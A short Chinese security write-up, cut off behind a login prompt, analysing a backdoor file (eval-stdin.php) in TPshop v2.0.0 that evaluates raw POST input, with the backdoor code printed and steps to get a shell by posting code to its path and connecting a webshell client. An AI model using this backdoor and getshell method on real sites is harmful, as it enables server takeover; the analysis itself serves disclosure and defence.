2 4 APP

TPshop商城 Getshell后门文件分析与复现

发布于 2001/12/05 FreeBuF.COM
本文作者:i春秋签约作家——Laimooc 官网地址:http://www.tp-shop.cn/ 影响版本:TPSHOP v2.0.0 后门文件:eval-stdin.php 内容: <?php  eval('?>' . file_get_contents('php://input')); ?> 分析: 使用 file_get_contents('php://input')) 接收POST请求的原始数据流 eval函数来执行。 我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不: 利用方法: 访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。 那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接. 采用写入的话就有点麻烦了。 地址: http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-std... 登录后阅读全文
本站内收录的所有文章及其中资源(图片、视频等)均来自于互联网,其版权均归原作者及其网站所有。

评论(0)